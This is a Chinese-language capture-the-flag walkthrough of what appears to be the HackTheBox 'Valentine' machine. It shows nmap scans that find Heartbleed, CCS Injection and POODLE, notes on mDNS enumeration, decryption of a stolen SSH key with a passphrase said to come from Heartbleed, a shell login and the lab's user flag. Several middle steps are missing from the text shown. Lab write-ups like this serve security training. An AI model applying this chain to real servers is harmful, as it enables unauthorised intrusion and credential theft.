┌──(kali㉿kali)-[~/桌面] └─$ sudo nmap -min-rate 10000 -p- 10.10.10.79 PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 443/tcp open https
┌──(kali㉿kali)-[~/桌面] └─$ sudo nmap -min-rate 10000 -p- -sU 10.10.10.79 PORT STATE SERVICE 5353/udp open zeroconf
┌──(kali㉿kali)-[~/桌面] └─$ sudo nmap -sT -sV -O -p22,80,443,5353 10.10.10.79 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) 443/tcp open ssl/http Apache httpd 2.2.22 ((Ubuntu)) 5353/tcp closed mdns
┌──(kali㉿kali)-[~/桌面] └─$ sudo nmap -sT -sV -O -p5353 -sU 10.10.10.79 PORT STATE SERVICE VERSION 5353/tcp closed mdns 5353/udp open mdns DNS-based service discovery
──(kali㉿kali)-[~/桌面] └─$ sudo nmap --script=vuln -p22,80,443,5353 10.10.10.79 Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 21:31 CST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 10.10.10.79 Host is up (0.27s latency).
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) | http-enum: | /dev/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)' |_ /index/: Potentially interesting folder |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. 443/tcp open https |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug) | ssl-heartbleed: | VULNERABLE: | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption. | State: VULNERABLE | Risk factor: High | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves. | | References: | http://cvedetails.com/cve/2014-0160/ | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 |_ http://www.openssl.org/news/secadv_20140407.txt |_http-csrf: Couldn't find any CSRF vulnerabilities. |_http-aspnet-debug: ERROR: Script execution failed (use -d to debug) | ssl-ccs-injection: | VULNERABLE: | SSL/TLS MITM vulnerability (CCS Injection) | State: VULNERABLE | Risk factor: High | OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h | does not properly restrict processing of ChangeCipherSpec messages, | which allows man-in-the-middle attackers to trigger use of a zero | length master key in certain OpenSSL-to-OpenSSL communications, and | consequently hijack sessions or obtain sensitive information, via | a crafted TLS handshake, aka the "CCS Injection" vulnerability. | | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 | http://www.openssl.org/news/secadv_20140605.txt |_ http://www.cvedetails.com/cve/2014-0224 |_http-dombased-xss: Couldn't find any DOM based XSS. | ssl-poodle: | VULNERABLE: | SSL POODLE information leak | State: VULNERABLE | IDs: BID:70574 CVE:CVE-2014-3566 | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other | products, uses nondeterministic CBC padding, which makes it easier | for man-in-the-middle attackers to obtain cleartext data via a | padding-oracle attack, aka the "POODLE" issue. | Disclosure date: 2014-10-14 | Check results: | TLS_RSA_WITH_AES_128_CBC_SHA | References: | https://www.imperialviolet.org/2014/10/14/poodle.html | https://www.openssl.org/~bodo/ssl-poodle.pdf | https://www.securityfocus.com/bid/70574 |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 5353/tcp closed mdns
┌──(kali㉿kali)-[~/桌面] └─$ sudo nmap --script=vuln -p5353 -sU 10.10.10.79 Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 21:34 CST Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable). Nmap scan report for 10.10.10.79 Host is up (0.28s latency).
PORT STATE SERVICE 5353/udp open zeroconf
3、除了常规的端口外,我们发现了个udp端口5353,根据扫描出来的信息,他其实是 DNS-based service discovery 一个DNS的本地解析服务。
4、以前没接触过,这里简单记录下。
多播 DNS (mDNS) 是一种**零配置协议**,允许你在没有传统单播 DNS 服务器的情况下,在本地网络上执行类似 DNS 的操作。该协议使用与 DNS 相同的 API、数据包格式和操作语义,允许你解析本地网络上的域名。**DNS 服务发现 (DNS-SD)** 是一种协议,允许客户端使用标准 DNS 查询在域中**发现命名的服务实例列表**(例如 test._ipps._tcp.local 或 linux._ssh._tcp.local)。DNS-SD 最常与 mDNS 结合使用,但并不依赖于它。它们都被许多物联网设备使用,例如网络打印机、Apple TV、Google Chromecast、网络附加存储 (NAS) 设备和摄像头。 **默认端口:**5353/UDP
5、枚举下5353端口信息瞅瞅。
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(kali㉿kali)-[~/桌面] └─$ sudo nmap -Pn -sUC -p5353 10.10.10.79 Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 21:53 CST Nmap scan report for 10.10.10.79 Host is up (0.28s latency).
PORT STATE SERVICE 5353/udp open zeroconf | dns-service-discovery: | 9/tcp workstation | Address=10.10.10.79 dead:beef::5c52:5f2c:f062:c369 | 22/tcp udisks-ssh |_ Address=10.10.10.79 dead:beef::5c52:5f2c:f062:c369
1) Coffee. 2) Research. 3) Fix decoder/encoder before going live. 4) Make sure encoding/decoding is only done client-side. 5) Don't use the decoder/encoder until any of this is done. 6) Find a better way to take notes.
┌──(kali㉿kali)-[~/桌面] └─$ openssl rsa -in hype_key_encrypted -out hype_key_decrypted Enter pass phrase for hype_key_encrypted: writing RSA key
16、这里的密码是从一开始nmap的漏洞脚本扫描的 heartbleed 中获取的
1
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
New release '14.04.5 LTS' available. Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3 hype@Valentine:~$ hype@Valentine:~$ pwd /home/hype hype@Valentine:~$ ls Desktop Downloads Pictures Templates Videos Documents Music Public user.txt hype@Valentine:~$ cat user.txt c531325996c71c033e0b49e967033373 hype@Valentine:~$